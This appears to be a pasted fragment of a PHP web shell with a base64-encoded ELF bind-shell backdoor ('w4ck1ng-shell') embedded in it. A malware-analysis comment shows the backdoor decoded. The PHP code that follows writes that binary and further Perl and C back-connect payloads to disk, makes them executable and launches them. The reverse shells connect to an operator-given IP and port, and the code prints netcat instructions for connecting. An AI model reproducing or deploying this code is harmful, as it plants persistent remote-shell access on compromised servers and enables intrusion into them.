CAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAAAIlEJASLRfCJBCToKP7//4XAeRjHBCSTiQQI6Kj9///HBCQBAAAA6Bz+///HRCQECAAAAItF8IkEJOi5/f//hcB5GMcEJJiJBAjoef3//8cEJAEAAADo7f3//8dF6BAAAACNReiNVcSJRCQIiVQkBItF8IkEJOht/f//iUX0g330AHkMxwQkjIkECOg4/f//6EP9//+FwA+EpwAAAItF+Ln/////iUW4uAAAAAD8i3248q6JyPfQg+gBx0QkDAAAAACJRCQIi0X4iUQkBItF9IkEJOiQ/f//x0QkBAAAAACLRfSJBCTo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AJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
  137.  
  138. /*==================DECODED BY MALWAREMUSTDIE===============================
  139.  
  140. ELF��������������4���������4� ��(�"�����4���44�������������������������������������� �� ����������� ��4��8����������� �����������������(��(( ��� ���������Qtd��������������������������/lib/ld-linux.so.2�����������GNU������������������������������������������� ������������
  141. ��������������
  142. ������������������������������������������������������� ���������� �����������������������������.�������u������������q������4�������������j�������Z������L�������x������c�������9������X�������9�������������������;�������:������S�������9������u�������������z�������+������G�������x������o����������������H�����@�������9����������������� �������������� ����_Jv_RegisterClasses�__gmon_start__�libc.so.6�execl�perror�dup2�socket�send�accept�bind�setsockopt�listen�fork�htons�exit�atoi�_IO_stdin_used�__libc_start_main�close�GLIBC_2.0���������������������������$����������ii
  143. ���������������������������� ��
  144. �� ��Ě ��Ț
  145. ��̚��К��U1����[���5%����%h����%h���%h���%h���%h ���%h(���%h0���%h8���p%h@���`%hH���P%hP���@%ĚhX���0%Țh`��� %̚hh���%Кhp����1^PTRhh\QVh@_US���ÿ��tЃ[]Ë$U=�t ܚҡܚuUt����t $ÐUWd����)E���ELD$����D$���$��� E}�y$4$���fE�E����E �$$fED$���ED$ D$���D$���E$ED$���D$E$(y$$���D$���E$y$y$���E���EUĉD$T$E$mE}�y $8C���EE����}ЃD$ ����D$ED$E$D$����E$=D$���E$*D$���E$D$����D$${E$$����E$iUWV1S#��  E)9sE)9r [^_]U]-��u} )u:���]u}]ÐUStЋCu[]ÐUS_��[]��������:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
  146.  
  147. �socket�bind�listen�/bin/sh���������������������$��� ���
  148. ���$���H������
  149. ������ �������������������x���������������������������oo���o������������������������������������������������������������Ƅք&6FVfv���������GCC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)��GCC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)��GCC: (GNU) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)��GCC: (GNU) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)��GCC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)��GCC: (GNU) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)��GCC: (GNU) 3.4.6 (Ubuntu 3.4.6-1ubuntu2)����������������"�����������4���� ����������$��� ���ą$�����������,��������������;��������������!����z������y���_IO_stdin_used�����v������������…../sysdeps/i386/elf/start.S�/build/buildd/glibc-2.3.6/build-tree/glibc-2.3.6/csu�GNU AS 2.16.91��������[���ąąb�������������T���������V������int�F������K������]���������HO��������V������/build/buildd/glibc-2.3.6/build-tree/i386-libc/csu/crti.S�/build/buildd/glibc-2.3.6/build-tree/glibc-2.3.6/csu�GNU AS 2.16.91�����f���/��/build/buildd/glibc-2.3.6/build-tree/i386-libc/csu/crtn.S�/build/buildd/glibc-2.3.6/build-tree/glibc-2.3.6/csu�GNU AS 2.16.91��%���% ��$� > ��$� > ��4�: ; I? 
  150. ��&�I����%����%���W����2���
  151. ������../sysdeps/i386/elf��start.S������3!4=%" YZ!"\[�#�������
  152. �������init.c���������P���
  153. ������/build/buildd/glibc-2.3.6/build-tree/i386-libc/csu��crti.S������=��$.!/!Yg��!/=��ą
  154. !/!Yg=g//0=!!�����P���
  155. ������/build/buildd/glibc-2.3.6/build-tree/i386-libc/csu��crtn.S�����!=��;=!!�� !�init.c�short int�/build/buildd/glibc-2.3.6/build-tree/glibc-2.3.6/csu�long long int�unsigned char�GNU C 3.4.6 (Ubuntu 3.4.6-1ubuntu2)�long long unsigned int�short unsigned int�_IO_stdin_used��.symtab�.strtab�.shstrtab�.interp�.note.ABI-tag�.hash�.dynsym�.dynstr�.gnu.version�.gnu.version_r�.rel.dyn�.rel.plt�.init�.text�.fini�.rodata�.eh_frame�.ctors�.dtors�.jcr�.dynamic�.got�.got.plt�.data�.bss�.comment�.debug_aranges�.debug_pubnames�.debug_info�.debug_abbrev�.debug_line�.debug_str�����������������������������������������������������������������������#���������((�� ������������������1���������HH������������������7��� ��������0��������������?�����������������������������G���o�����&����������������T���o����� ����������������c��� ������������������������l��� ��������x������ ���������u�����������������������������p����������������������������{�������������������������������������$$ �����������������������������DD ��c��������������������������� ����������������������������� ����������������������������� ����������������������������� ����������������������������� ���������������������������
  156. ����������������������������
  157. ��H��������������������������Ԛ
  158. �� ���������������������������
  159. ����������������������������������
  160. ��&������������������������������� ���������������������������������� ��%�������������������������������� ��+��������������������������������v�������������������������������V������������������������0������������������������������������������'�������������������������������H����!���?��������� ��������������8�������������������������������������������������(����������H����������������������������������������������������������������� ����������
  161. ���������� ���������� �����$�����
  162. �����D��������������������������������������������������������������������������������Ԛ��������������������������������������������������������������������������������������������������������������������������������������������� ��������������!������������� ������������(������������/������������:������������t���ą����� ���������������������������������������������������ܚ�������������� ��������� �������������������������������
  163. ����������������$������� �/������������:�����������t�����������x������������������������������������������������u�����������q��������D�����������������������Z������*��ؚ�����7��J���� �G������x������Y�������
  164. �_������9������q������9������������� ���\Q���� ����������@��� �������������������:��������Ԛ���� ��������9��������$�����
  165. �������������
  166. ������+�������������$������ �;�������@������x������P������������a��H�����p��Ԛ������}������9���������������� ������������� ����abi-note.S�../sysdeps/i386/elf/start.S�init.c�initfini.c�/build/buildd/glibc-2.3.6/build-tree/i386-libc/csu/crti.S�call_gmon_start�crtstuff.c�__CTOR_LIST__�__DTOR_LIST__�__JCR_LIST__�completed.4463�p.4462�__do_global_dtors_aux�frame_dummy�__CTOR_END__�__DTOR_END__�__FRAME_END__�__JCR_END__�__do_global_ctors_aux�/build/buildd/glibc-2.3.6/build-tree/i386-libc/csu/crtn.S�1.c�_DYNAMIC�__fini_array_end�__fini_array_start�__init_array_end�_GLOBAL_OFFSET_TABLE_�__init_array_start�execl@@GLIBC_2.0�close@@GLIBC_2.0�_fp_hw�perror@@GLIBC_2.0�fork@@GLIBC_2.0�__dso_handle�__libc_csu_fini�accept@@GLIBC_2.0�_init�listen@@GLIBC_2.0�setsockopt@@GLIBC_2.0�_start�__libc_csu_init�__bss_start�main�__libc_start_main@@GLIBC_2.0�dup2@@GLIBC_2.0�data_start�bind@@GLIBC_2.0�_fini�exit@@GLIBC_2.0�atoi@@GLIBC_2.0�_edata�__i686.get_pc_thunk.bx�_end�send@@GLIBC_2.0�htons@@GLIBC_2.0�_IO_stdin_used�__data_start�socket@@GLIBC_2.0�_Jv_RegisterClasses�__gmon_start__�
  167.  
  168. ========================= */
  169.  
  170. function checkproxyhost(){
  171. $host = getenv("HTTP_HOST");
  172. $filename = '/tmp/.setan/xh';
  173. if (file_exists($filename)) {
  174. $_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
  175. } else {
  176. $_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
  177. }
  178. }
  179.  
  180. if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
  181. {
  182. $ip = gethostbyname($_SERVER["HTTP_HOST"]);
  183. $por = $_POST['backconnectport'];
  184. if(is_writable(".")){
  185. cfb("shbd",$backdoor);
  186. ex("chmod 777 shbd");
  187. $cmd = "./shbd $por";
  188. exec("$cmd > /dev/null &");
  189. $scan = myshellexec("ps aux");
  190. if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
  191. $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
  192. }else{
  193. cfb("/tmp/shbd",$backdoor);
  194. ex("chmod 777 /tmp/shbd");
  195. $cmd = "./tmp/shbd $por";
  196. exec("$cmd > /dev/null &");
  197. $scan = myshellexec("ps aux");
  198. if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
  199. $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
  200. }
  201. }
  202.  
  203. if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
  204. {
  205. if(is_writable(".")){
  206. cf("back",$back_connect);
  207. $p2=which("perl");
  208. $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  209. $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
  210. if (file_exists("back")) { unlink("back"); }
  211. }else{
  212. cf("/tmp/back",$back_connect);
  213. $p2=which("perl");
  214. $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  215. $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
  216. if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
  217. }
  218. }
  219.  
  220. if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
  221. {
  222. if(is_writable(".")){
  223. cf("backc",$back_connect_c);
  224. ex("chmod 777 backc");
  225. //$blah = ex("gcc back.c -o backc");
  226. $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  227. $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
  228. //if (file_exists("back.c")) { unlink("back.c"); }
  229. if (file_exists("backc")) { unlink("backc"); }
  230. }else{
  231. ex("chmod 777 /tmp/backc");
  232. cf("/tmp/backc",$back_connect_c);
  233. //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
  234. $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  235. $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
  236. //if (file_exists("back.c")) { unlink("back.c"); }
  237. if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
  238. }
  239.  
  240. function cf($fname,$text)
  241. {
  242. $w_file=@fopen($fname,"w") or err();
  243. if($w_file)
  244. {
  245. @fputs($w_file,@base64_decode($text));
  246. @fclose($w_file);
  247. }
  248. }
  249.  
  250. function cfb($fname,$text)
  251. {
  252. $w_file=@fopen($fname,"w") or bberr();
  253. if($w_file)
  254. {
  255. @fputs($w_file,@base64_decode($text));
  256. @fclose($w_file);
  257. }
  258. }
  259.  
  260. function err()
  261. {
  262. $_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
  263. }
  264.  
  265. function bberr()
  266. {
  267. $_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
  268. }
  269.  
